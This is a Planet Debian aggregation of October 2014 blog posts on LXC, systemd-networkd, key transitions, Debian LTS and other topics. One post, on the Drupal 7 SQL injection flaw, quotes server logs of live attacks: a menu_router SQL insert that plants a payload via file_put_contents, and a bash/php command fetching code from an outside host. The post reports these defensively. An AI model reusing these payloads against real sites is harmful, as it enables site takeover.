October 20, 2014

hackergotchi for Francois Marier

Francois Marier

LXC setup on Debian jessie

Here's how to setup LXC-based "chroots" on Debian jessie. While this is documented on the Debian wiki, I had to tweak a few things to get the networking to work on my machine.

Start by installing (as root) the necessary packages:

apt-get install lxc libvirt-bin debootstrap

Network setup

I decided to use the default /etc/lxc/default.conf configuration (no change needed here):

lxc.network.type = veth
lxc.network.flags = up
lxc.network.link = virbr0
lxc.network.hwaddr = 00:FF:AA:xx:xx:xx
lxc.network.ipv4 = 0.0.0.0/24

but I had to make sure that the "guests" could connect to the outside world through the "host":

  1. Enable IPv4 forwarding by putting this in /etc/sysctl.conf:

    net.ipv4.ip_forward=1
    
  2. and then applying it using:

    sysctl -p
    
  3. Ensure that the network bridge is automatically started on boot:

    virsh -c lxc:/// net-start default
    virsh -c lxc:/// net-autostart default
    
  4. and that it's not blocked by the host firewall, by putting this in /etc/network/iptables.up.rules:

    -A INPUT -d 224.0.0.251 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.255 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.1 -s 192.168.122.0/24 -j ACCEPT
    
  5. and applying the rules using:

    iptables-apply
    

Creating a container

Creating a new container (in /var/lib/lxc/) is simple:

sudo MIRROR=http://ftp.nz.debian.org/debian lxc-create -n sid64 -t debian -- -r sid -a amd64

You can start or stop it like this:

sudo lxc-start -n sid64 -d
sudo lxc-stop -n sid64

Connecting to a guest using ssh

The ssh server is configured to require pubkey-based authentication for root logins, so you'll need to log into the console:

sudo lxc-stop -n sid64
sudo lxc-start -n sid64

then install a text editor inside the container because the root image doesn't have one by default:

apt-get install vim

then paste your public key in /root/.ssh/authorized_keys.

Then you can exit the console (using Ctrl+a q) and ssh into the container. You can find out what IP address the container received from DHCP by typing this command:

sudo lxc-ls --fancy

Fixing Perl locale errors

If you see a bunch of errors like these when you start your container:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "fr_CA.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

then log into the container as root and use:

dpkg-reconfigure locales

to enable the same locales as the ones you have configured in the host.

20 October, 2014 02:00AM

October 19, 2014

hackergotchi for Neil Williams

Neil Williams

OpenTAC – an automation lab in a box

I’ve previously covered running LAVA on ARM devices, now that the packages are in Debian. I’ve also covered setting up the home lab, including the difficulty in obtaining the PDU and relying on another machine to provide USB serial converters with inherent problems of needing power to keep the same devices assigned to the same ser2net ports.

There have been ideas about how to improve the situation. Conferences are a prime example – setting up a demo involving LAVA means bringing a range of equipment, separate power bricks, separate network switches (with power bricks), a device of some kind to connect up the USB serial converters (and power brick) and then the LAVA server (with SATA drive and power brick) – that is without the actual devices and their cables and power. Each of those power cables tend to be a metre long, with networking and serial, it quickly becomes a cable spaghetti.

Ideas around this also have application inside larger deployments, so the hardware would need to daisy-chain to provide services to a rack full of test devices.

The objective is a single case providing network, power and serial connectivity to a number of test devices over a single power input and network uplink. Naturally, with a strong free software and open development bias, the unit will be Open Hardware running Debian, albeit with a custom Beaglebone Linux kernel. It’s a Test Automation Controller, so we’re using the name OpenTAC.

Progress

Open hardware ARM device running Debian to automate tests on 4 to 8 devices, initially aimed at LAVA support for Linaro engineers. Power distribution, serial console, network and optional GPIO extensions.

The design involves:

  • A Beaglebone Black (revC)
    • USB hotplug support required, certainly during development.
  • Custom PCB connected as a Beaglebone Cape, designed by Andy Simpkins.
  • Base board provides 4 channels:
    • 5V Power – delivered over USB
    • Ethernet – standard Cat5, no LEDs
    • Serial connectivity
      • RS232
      • UART
    • GPIO
  • Internal gigabit network switch
  • Space for a board like a CubieTruck (with SATA drive) to act as LAVA server
  • Daughter board:
    • Same basic design as the base board, providing another 4 channels, equivalent to the base channels. When the daughter board is fitted, a second network switch would be added instead of the CubieTruck.
  • Power consumption measurement per channel
    • queries made via the Beaglebone Black over arbitrary time periods, including during the test itself.
  • The GPIO lines can be used to work around issues with development boards under test, including closing connections which may be required to get a device to reboot automatically, without manual intervention.
  • Serial connections to test devices can be isolated during device power-cycles – this allows for devices which pull power over the serial connection. (These are typically hardware design issues but the devices still need to be tested until the boards can be modified or replaced.)
  • Thermal control, individual fan control via the Beaglebone Black.
  • 1U case – rackable or used alone on the desk of developers.
  • Software design:
    • lavapdu backend module for PDU control (opentac.py) & opentac daemon on the BBB
      • telnet opentac-01 3225
    • ser2net for serial console control
      • telnet opentac-01 4000

The initial schematics are now complete and undergoing design review. A lot of work remains …

19 October, 2014 10:34PM by Neil Williams

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

littler 0.2.1

max-heap image

A new maintenance release of littler is available now.

The main change are a few updates and extensions to the examples provided along with littler. Several of those continue to make use of the wonderful docopt package by Edwin de Jonge. Carl Boettiger and I are making good use of these littler examples, particularly to install directly from CRAN or GitHub, in our Rocker builds of R for Docker (about which we should have a bit more to blog soon too).

Full details for the littler release are provided as usual at the ChangeLog page.

The code is available via the GitHub repo, from tarballs off my littler page and the local directory here. A fresh package has gone to the incoming queue at Debian; Michael Rutter will probably have new Ubuntu binaries at CRAN in a few days too.

Comments and suggestions are welcome via the mailing list or issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

19 October, 2014 09:09PM

Thorsten Alteholz

Key transition, move to stronger key

Finally I was able to do the enormous paperwork (no, it is not that much) to switch my old 1024D key to a new 4096R one. I was a bit afraid that there might be something bad happening, but my fear was without any reason. After the RT bug was closed, I could upload and sent signed emails to mailing lists. So thanks alot to everyone involved.

old key, 0xD362B62A54B99890

pub   1024D/54B99890 2008-07-23
      Key fingerprint = 36E2 EDDE C21F EC8F 77B8  7436 D362 B62A 54B9 9890
uid                  Thorsten Alteholz (...)
sub   4096g/622D94A8 2008-07-23


new key, 0xA459EC6715B0705F

pub   4096R/0xA459EC6715B0705F 2014-02-03
  Schl.-Fingerabdruck = C74F 6AC9 E933 B306 7F52  F33F A459 EC67 15B0 705F
uid                 [ uneing.] Thorsten Alteholz (...)
sub   4096R/0xAE861AE7F39DF730 2014-02-03
  Schl.-Fingerabdruck = B8E7 6074 5FF4 C707 1C77  870C AE86 1AE7 F39D F730
sub   4096R/0x96FCAC0D387B5847 2014-02-03
  Schl.-Fingerabdruck = 6201 FBFF DBBD E078 22EA  BB96 96FC AC0D 387B 5847

19 October, 2014 08:44PM by alteholz

hackergotchi for Benjamin Mako Hill

Benjamin Mako Hill

Another Round of Community Data Science Workshops in Seattle

Pictures from the CDSW sessions in Spring 2014Pictures from the CDSW sessions in Spring 2014

I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year.

The workshops are for people with no previous programming experience and will be free of charge and open to anyone.

Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like:

  • Are new contributors to an article in Wikipedia sticking around longer or contributing more than people who joined last year?
  • Who are the most active or influential users of a particular Twitter hashtag?
  • Are people who participated in a Wikipedia outreach event staying involved? How do they compare to people that joined the project outside of the event?

If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help.

If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you’re interested, send me an email.

19 October, 2014 01:19AM by Benjamin Mako Hill

October 18, 2014

hackergotchi for Steve Kemp

Steve Kemp

On the names we use in email

Yesterday I received a small rush of SPAM mails, all of which were 419 scams, and all of them sent by "Mrs Elizabeth PETERSEN".

It struck me that I can't think of ever receiving a legitimate mail from a "Mrs XXX [YYY]", but I was too busy to check.

Today I've done so. Of the 38,553 emails I've received during the month of October 2014 I've got a hell of a lot of mails with a From address including a "Mrs" prefix:

"Mrs.Clanzo Amaki" <marilobouabre14@yahoo.co.jp>
"Mrs Sarah Mamadou"<investment@payment.com>
"Mrs Abia Abrahim" <missfatimajinnah@yahoo.co.jp>
"Mrs. Josie Wilson" <linn3_2008@yahoo.co.jp>
"Mrs. Theresa Luis"<tomaslima@jorgelima.com>

There are thousands more. Not a single one of them was legitimate.

I have one false-positive when repeating the search for a Mr-prefix. I have one friend who has set his sender-address to "Mr Bob Smith", which always reads weirdly to me, but every single other email with a Mr-prefix was SPAM.

I'm not going to use this in any way, since I'm happy with my mail-filtering setup, but it was interesting observation.

Names are funny. My wife changed her surname post-marriage, but that was done largely on the basis that introducing herself as "Doctor Kemp" was simpler than "Doctor Foreign-Name", she'd certainly never introduce herself ever as Mrs Kemp.

Trivia: In Finnish the word for "Man" and "Husband" is the same (mies), but the word for "Woman" (nainen) is different than the word for "Wife" (vaimo).

18 October, 2014 11:03PM

hackergotchi for Erich Schubert

Erich Schubert

Beware of trolls - do not feed

A particularly annoying troll has been on his hate crusade against systemd for months now.
Unfortunately, he's particularly active on Debian mailing lists (but apparently also on Ubuntu and the Linux Kernel mailing list) and uses a tons of fake users he keeps on setting up. Our listmasters have a hard time blocking all his hate, sorry.
Obviously, this is also the same troll that has been attacking Lennart Poettering.
There is evidence that this troll used to go by the name "MikeeUSA", and has quite a reputation with anti-feminist hate for over 10 years now.
Please, do not feed this troll.
Here are some names he uses on YouTube: Gregory Smith, Matthew Bradshaw, Steve Stone.
Blacklisting is the best measure we have, unfortunately.
Even if you don't like the road systemd is taking or Lennart Poetting personall - the behaviour of that troll is unacceptable to say the least; and indicates some major psychological problems... also, I wouldn't be surprised if he is also involved in #GamerGate.
See this example (LKML) if you have any doubts. We seriously must not tolerate such poisonous people.
If you don't like systemd, the acceptable way of fighting it is to write good alternative software (and you should be able to continue using SysV init or openRC, unless there is a bug, in Debian - in this case, provide a bug fix). End of story.

18 October, 2014 05:41PM

hackergotchi for Rhonda D'Vine

Rhonda D'Vine

Trans Gender Moves

Yesterday I managed to get the last ticket from the waitinglist for the premiere of Trans Gender Moves. It is a play about the lives of three people: A transman, a transwoman and an intersexual person. They tell stories from their life, their process of finding their own identity over time. With in parts amusing anecdotes and ones that gets you thinking I can just wholeheartly encourage you to watch it if you have the chance to. It will still be shown the next few days, potentially extending depending on the requests for tickets, from what I've been told by one of the actors.

The most funny moment for me though was when I was talking with one of the actors about that it really touched me that I was told that one of them will be moving into into the same building I will be moving into in two year's time. Unfortunately that will be delayed a bit because they found me thinks field hamster or the likes in the ground and have to wait until spring for them to move. :/

/personal | permanent link | Comments: 4 | Flattr this

18 October, 2014 10:14AM by Rhonda

October 17, 2014

hackergotchi for Martin Pitt

Martin Pitt

Ramblings from LinuxCon/Plumbers 2014

I’m on my way home from Düsseldorf where I attended the LinuxCon Europe and Linux Plumber conferences. I was quite surprised how huge LinuxCon was, there were about 1.500 people there! Certainly much more than last year in New Orleans.

Containers (in both LXC and docker flavors) are the Big Thing everybody talks about and works with these days; there was hardly a presentation where these weren’t mentioned at all, and (what felt like) half of the presentations were either how to improve these, or how to use these technologies to solve problems. For example, some people/companies really take LXC to the max and try to do everything in them including tasks which in the past you had only considered full VMs for, like untrusted third-party tenants. For example there was an interesting talk how to secure networking for containers, and pretty much everyone uses docker or LXC now to deploy workloads, run CI tests. There are projects like “fleet” which manage systemd jobs across an entire cluster of containers (distributed task scheduler) or like project-builder.org which auto-build packages from each commit of projects.

Another common topic is the trend towards building/shipping complete (r/o) system images, atomic updates and all that goodness. The central thing here was certainly “Stateless systems, factory reset, and golden images” which analyzed the common requirements and proposed how to implement this with various package systems and scenarios. In my opinion this is certainly the way to go, as our current solution on Ubuntu Touch (i. e. Ubuntu’s system-image) is far too limited and static yet, it doesn’t extend to desktops/servers/cloud workloads at all. It’s also a lot of work to implement this properly, so it’s certainly understandable that we took that shortcut for prototyping and the relatively limited Touch phone environment.

On Plumbers my main occupations were mostly the highly interesting LXC track to see what’s coming in the container world, and the systemd hackfest. On the latter I was again mostly listening (after all, I’m still learning most of the internals there..) and was able to work on some cleanups and improvements like getting rid of some of Debian’s patches and properly run the test suite. It was also great to sync up again with David Zeuthen about the future of udisks and some particular proposed new features. Looks like I’m the de-facto maintainer now, so I’ll need to spend some time soon to review/include/clean up some much requested little features and some fixes.

All in all a great week to meet some fellows of the FOSS world a gain, getting to know a lot of new interesting people and projects, and re-learning to drink beer in the evening (I hardly drink any at home :-P).

If you are interested you can also see my raw notes, but beware that there are mostly just scribbling.

Now, off to next week’s Canonical meeting in Washington, DC!

17 October, 2014 04:54PM by pitti

hackergotchi for Gunnar Wolf

Gunnar Wolf

#Drupal7 sites under attack — Don't panic!

Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

sid / jessie (unstable / testing)
7.32-1
wheezy (stable)
7.14-2+deb7u7
wheezy-backports
7.32-1~bpo70+1
squeeze-backports (oldstable)
7.14-2+deb7u7~bpo60+1

And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

  1. Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
  2. total name length limit exceeded - dropped variable 'name[0; INSERT INTO
  3. `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
  4. `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
  5. 'file_put_contents',
  6. +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
  7. );;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

While the previous one is clearly targetting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

  1. Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
  2. name length limit exceeded - dropped variable
  3. '/bin/bash_-c_"php_-r_\"file_get_contents(
  4. 'http://hello_hacked_jp/hello/?l'
  5. (attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

Anyway... We shall see many such attempts in the next weeks :-|

[update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

17 October, 2014 04:24PM by gwolf

hackergotchi for Erich Schubert

Erich Schubert

Google Earth on Linux

Google Earth for Linux appears to be largely abandoned by Google, unfortunately. The packages available for download cannot be installed on a modern amd64 Debian or Ubuntu system due to dependency issues.
In fact, the adm64 version is a 32 bit build, too. The packages are really low quality, the dependencies are outdated, locales support is busted etc.
So here are hacky instructions how to install nevertheless. But beware, these instructions are a really bad hack.
  1. These instructions are appropriate for version 7.1.2.2041-r0. Do not use them for any other version. Things will have changed.
  2. Make sure your system has i386 architecture enabled. Follow the instructions in section "Configuring architectures" on the Debian MultiArch Wiki page to do so
  3. Install lsb-core, and try to install the i386 versions of these packages, too!
  4. Download the i386 version of the Google Earth package
  5. Install the package by forcing dependencies, via
    sudo dpkg --force-depends -i google-earth-stable_current_i386.deb
    
  6. As of now, your package manager will complain, and suggest to remove the package again. To make it happy, we have to hack the installed packages list. This is ugly, and you should make a backup. You can totally bust your system this way... Fortunately, the change we're doing is rather simple. As admin, edit the file /var/lib/dpkg/status. Locate the section Package: google-earth-stable. In this section, delete the line starting with Depends:. Don't add in extra newlines or change anything else!
  7. Now the package manager should believe the dependencies of Google Earth are fulfilled, and no longer suggest removal. But essentially this means you have to take care of them yourself!
Some notes on using Google Earth:
  • Locales are busted. Use LC_NUMERIC=en_US.UTF-8 google-earth to start it. Otherwise, it will fail parsing coordinates, if you are in a locale that uses a different number format.
  • You may need to install the i386 versions of some libraries, in particular of your OpenGL drivers! I cannot provide you with a complete list.
  • Search doesn't work sometimes for me.
  • Occassionally, it reports "unknown" network errors.
  • If you upgrade Nvidia graphics drivers, you will usually have to reboot, or you will see graphics errors.
  • Some people have removed/replaced the bundled libQt* and libfreeimage* libraries, but that did not work for me.

17 October, 2014 02:59PM

hackergotchi for Tanguy Ortolo

Tanguy Ortolo

Trying systemd [ OK ] Switching back to SysV [ OK ]

Since systemd is now the default init system under Debian Jessie, it got installed to my system and I had a chance to test it. The result is disappointing: it does not work well with cryptsetup, so I am switching back to SysV init and RC.

The problem comes from the fact that I am using encrypted drives with cryptsetup, and while this is correctly integrated with SysV, it just sucks with systemd, where the passphrase prompt is mixed up with service start messages, a bit like that (from memory, since I did not take a picture of my system booting):

Enter passphrase for volume foobar-crypt:
[ OK ] Sta*rting serv*ice foo**
[ OK ] ***Starting service bar**
[ OK ] Starting service baz****

The stars correspond to the letters I type, and as you can see, as the passphrase prompt does not wait for my input, they get everywhere in the boot messages, and there is no clear indication that the passphrase was accepted. This looks like some pathological optimization for boot speed, where even interactive steps are run in parallel with services startup: sorry, but this is just insane.

There may exist ways to work around this issue, but I do not care: SysV init works just fine with no setup at all, and I since have no real need for another init system, systemd as a replacement is only acceptable if it works at least as fine for my setup, which is not the case. Goodbye systemd, come back when you are ready.

17 October, 2014 02:12PM by Tanguy

hackergotchi for Lucas Nussbaum

Lucas Nussbaum

Debian Package of the Day revival (quite)

TL;DR: static version of http://debaday.debian.net/, as it was when it was shut down in 2009, available!

A long time ago, between 2006 and 2009, there was a blog called Debian Package of the Day. About once per week, it featured an article about one of the gems available in the Debian archive: one of those many great packages that you had never heard about.

At some point in November 2009, after 181 articles, the blog was hacked and never brought up again. Last week I retrieved the old database, generated a static version, and put it online with the help of DSA. It is now available again at http://debaday.debian.net/. Some of the articles are clearly outdated, but many of them are about packages that are still available in Debian, and still very relevant today.

17 October, 2014 01:05PM by lucas

hackergotchi for Rhonda D'Vine

Rhonda D'Vine

New Irssi

After a long time a new irssi upstream release hit the archive. While the most notable change in 0.8.16 was DNSSEC DANE support which is enabled (for linux, src:dnsval has issues to get compiled on kFreeBSD), the most visible change in 0.8.17 was addition of support for both 256 colors and truecolor. While the former can be used directly, for the later you have to explicitly switch the setting colors_ansi_24bit to on. A terminal support it is needed for that though. To test the 256 color support, your terminal has to support it, your TERM environment variable has to be properly set, and you can test it with the newly added /cubes alias. If you have an existing configuration, look at the Testing new Irssi wiki page which helps you get that alias amongst giving other useful tipps, too.

The package currently only lives in unstable, but once it did flow over to testing I will update it in wheezy-backports, too.

Enjoy!

/debian | permanent link | Comments: 0 | Flattr this

17 October, 2014 12:39PM by Rhonda

Petter Reinholdtsen

Debian Jessie, PXE and automatic firmware installation

When PXE installing laptops with Debian, I often run into the problem that the WiFi card require some firmware to work properly. And it has been a pain to fix this using preseeding in Debian. Normally something more is needed. But thanks to my isenkram package and its recent tasksel extension, it has now become easy to do this using simple preseeding.

The isenkram-cli package provide tasksel tasks which will install firmware for the hardware found in the machine (actually, requested by the kernel modules for the hardware). (It can also install user space programs supporting the hardware detected, but that is not the focus of this story.)

To get this working in the default installation, two preeseding values are needed. First, the isenkram-cli package must be installed into the target chroot (aka the hard drive) before tasksel is executed in the pkgsel step of the debian-installer system. This is done by preseeding the base-installer/includes debconf value to include the isenkram-cli package. The package name is next passed to debootstrap for installation. With the isenkram-cli package in place, tasksel will automatically use the isenkram tasks to detect hardware specific packages for the machine being installed and install them, because isenkram-cli contain tasksel tasks.

Second, one need to enable the non-free APT repository, because most firmware unfortunately is non-free. This is done by preseeding the apt-mirror-setup step. This is unfortunate, but for a lot of hardware it is the only option in Debian.

The end result is two lines needed in your preseeding file to get firmware installed automatically by the installer:

base-installer base-installer/includes string isenkram-cli
apt-mirror-setup apt-setup/non-free boolean true

The current version of isenkram-cli in testing/jessie will install both firmware and user space packages when using this method. It also do not work well, so use version 0.15 or later. Installing both firmware and user space packages might give you a bit more than you want, so I decided to split the tasksel task in two, one for firmware and one for user space programs. The firmware task is enabled by default, while the one for user space programs is not. This split is implemented in the package currently in unstable.

If you decide to give this a go, please let me know (via email) how this recipe work for you. :)

So, I bet you are wondering, how can this work. First and foremost, it work because tasksel is modular, and driven by whatever files it find in /usr/lib/tasksel/ and /usr/share/tasksel/. So the isenkram-cli package place two files for tasksel to find. First there is the task description file (/usr/share/tasksel/descs/isenkram.desc):

Task: isenkram-packages
Section: hardware
Description: Hardware specific packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific packages are
 proposed.
Test-new-install: show show
Relevance: 8
Packages: for-current-hardware

Task: isenkram-firmware
Section: hardware
Description: Hardware specific firmware packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific firmware
 packages are proposed.
Test-new-install: mark show
Relevance: 8
Packages: for-current-hardware-firmware

The key parts are Test-new-install which indicate how the task should be handled and the Packages line referencing to a script in /usr/lib/tasksel/packages/. The scripts use other scripts to get a list of packages to install. The for-current-hardware-firmware script look like this to list relevant firmware for the machine:

#!/bin/sh
#
PATH=/usr/sbin:$PATH
export PATH
isenkram-autoinstall-firmware -l

With those two pieces in place, the firmware is installed by tasksel during the normal d-i run. :)

If you want to test what tasksel will install when isenkram-cli is installed, run DEBIAN_PRIORITY=critical tasksel --test --new-install to get the list of packages that tasksel would install.

Debian Edu will be pilots in testing this feature, as isenkram is used there now to install firmware, replacing the earlier scripts.

17 October, 2014 12:10PM

October 16, 2014

Bits from Debian

Help empower the Debian Outreach Program for Women

Debian is thrilled to participate in the 9th round of the GNOME FOSS Outreach Program. While OPW is similar to Google Summer of Code it has a winter session in addition to a summer session and is open to non-students.

Back at DebConf 14 several of us decided to volunteer because we want to increase diversity in Debian. Shortly thereafter the DPL announced Debian's participation in OPW 2014.

We have reached out to several corporate sponsors and are thrilled that so far Intel has agreed to fund an intern slot (in addition to the slot offered by the DPL)! While that makes two funded slots we have a third sponsor that has offered a challenge match: for each dollar donated by an individual to Debian the sponsor will donate another dollar for Debian OPW.

This is where we need your help! If we can raise $3,125 by October 22 that means we can mentor a third intern ($6,250). Please spread the word and donate today if you can at: http://debian.ch/opw2014/

If you'd like to participate as intern, the application deadline is the same (October 22nd). You can find out more on the Debian Wiki.

16 October, 2014 05:30PM by Tom Marble

October 15, 2014

hackergotchi for Raphaël Hertzog

Raphaël Hertzog

Freexian’s second report about Debian Long Term Support

Like last month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In September 2014, 3 contributors have been paid for 11h each. Here are their individual reports:

Evolution of the situation

Compared to last month, we have gained 5 new sponsors, that’s great. We’re now at almost 25% of a full-time position. But we’re not done yet. We believe that we would need at least twice as many sponsored hours to do a reasonable work with at least the most used packages, and possibly four times as much to be able to cover the full archive.

We’re now at 39 packages that need an update in Squeeze (+9 compared to last month), and the contributors paid by Freexian did handle 11 during last month (this gives an approximate rate of 3 hours per update, CVE triage included).

Open questions

Dear readers, what can we do to convince more companies to join the effort?

The list of sponsors contains almost exclusively companies from Europe. It’s true that Freexian’s offer is in Euro but the economy is world-wide and it’s common to have international invoices. When Ivan Kohler asked if having an offer in dollar would help convince other companies, we got zero feedback.

What are the main obstacles that you face when you try to convince your managers to get the company to contribute?

By the way, we prefer that companies take small sponsorship commitments that they can afford over multiple years over granting lots of money now and then not being able to afford it for another year.

Thanks to our sponsors

Let me thank our main sponsors:

15 October, 2014 07:45AM by Raphaël Hertzog

hackergotchi for Matthew Palmer

Matthew Palmer

My entry in the "Least Used Software EVAH" competition

For some reason, I seem to end up writing software for very esoteric use-cases. Today, though, I think I’ve outdone myself: I sat down and wrote a Ruby library to get and set process resource limits – those things that nobody ever thinks about except when they run out of file descriptors.

I didn’t even have a direct need for it. Recently I was grovelling through the EventMachine codebase, looking at the filehandle limit code, and noticed that the pure-ruby implementation didn’t manipulate filehandle limits. I considered adding it, then realised that there wasn’t a library available to do it. Since I haven’t berked around with FFI for a while, I decided to write rlimit. Now to find the time to write that patch for EventMachine…

Since I doubt there are many people who have a burning need to manipulate rlimits in Ruby, this gem will no doubt sit quiet and undisturbed in the dark, dusty corners of rubygems.org. However, for the three people on earth who find this useful: you’re welcome.

15 October, 2014 05:00AM by Matt Palmer (mpalmer@hezmatt.org)

October 14, 2014

Julian Andres Klode

Key transition

I started transitioning from 1024D to 4096R. The new key is available at:

https://people.debian.org/~jak/pubkey.gpg

and the keys.gnupg.net key server. A very short transition statement is available at:

https://people.debian.org/~jak/transition-statement.txt

and included below (the http version might get extended over time if needed).

The key consists of one master key and 3 sub keys (signing, encryption, authentication). The sub keys are stored on an OpenPGP v2 Smartcard. That’s really cool, isn’t it?

Somehow it seems that GnuPG 1.4.18 also works with 4096R keys on this smartcard (I accidentally used it instead of gpg2 and it worked fine), although only GPG 2.0.13 and newer is supposed to work.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1,SHA512

Because 1024D keys are not deemed secure enough anymore, I switched to
a 4096R one.

The old key will continue to be valid for some time, but i prefer all
future correspondence to come to the new one.  I would also like this
new key to be re-integrated into the web of trust.  This message is
signed by both keys to certify the transition.

the old key was:

pub   1024D/00823EC2 2007-04-12
      Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2

And the new key is:

pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
      Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iEYEARECAAYFAlQ9j+oACgkQrCpf/gCCPsKskgCgiRn7DoP5RASkaZZjpop9P8aG
zhgAnjHeE8BXvTSkr7hccNb2tZsnqlTaiQIcBAEBCgAGBQJUPY/qAAoJENc8OeVl
gLOGZiMP/1MHubKmA8aGDj8Ow5Uo4lkzp+A89vJqgbm9bjVrfjDHZQIdebYfWrjr
RQzXdbIHnILYnUfYaOHUzMxpBHya3rFu6xbfKesR+jzQf8gxFXoBY7OQVL4Ycyss
4Y++g9m4Lqm+IDyIhhDNY6mtFU9e3CkljI52p/CIqM7eUyBfyRJDRfeh6c40Pfx2
AlNyFe+9JzYG1i3YG96Z8bKiVK5GpvyKWiggo08r3oqGvWyROYY9E4nLM9OJu8EL
GuSNDCRJOhfnegWqKq+BRZUXA2wbTG0f8AxAuetdo6MKmVmHGcHxpIGFHqxO1QhV
VM7VpMj+bxcevJ50BO5kylRrptlUugTaJ6il/o5sfgy1FdXGlgWCsIwmja2Z/fQr
ycnqrtMVVYfln9IwDODItHx3hSwRoHnUxLWq8yY8gyx+//geZ0BROonXVy1YEo9a
PDplOF1HKlaFAHv+Zq8wDWT8Lt1H2EecRFN+hov3+lU74ylnogZLS+bA7tqrjig0
bZfCo7i9Z7ag4GvLWY5PvN4fbws/5Yz9L8I4CnrqCUtzJg4vyA44Kpo8iuQsIrhz
CKDnsoehxS95YjiJcbL0Y63Ed4mkSaibUKfoYObv/k61XmBCNkmNAAuRwzV7d5q2
/w3bSTB0O7FHcCxFDnn+tiLwgiTEQDYAP9nN97uibSUCbf98wl3/
=VRZJ
-----END PGP SIGNATURE-----

Filed under: Uncategorized

14 October, 2014 09:46PM by Julian Andres Klode

hackergotchi for Joachim Breitner

Joachim Breitner

Switching to systemd-networkd

Ever since I read about systemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

$ cat > /etc/systemd/network/eth.network <<__END__
[Match]
Name=eth0
[Network]
DHCP=yes
__END__
$ systemctl enable systemd-networkd
$ systemctl start systemd-networkd

I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

[Unit]
Description=WPA supplicant daemon (interface-specific version)
Requires=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=simple
ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I

[Install]
Alias=multi-user.target.wants/wpa_supplicant@%i.service

Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

[Match]
Name=wlan0
[Network]
DHCP=yes

does the rest.

So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

14 October, 2014 08:26PM by Joachim Breitner (mail@joachim-breitner.de)

Switching to sytemd-networkd

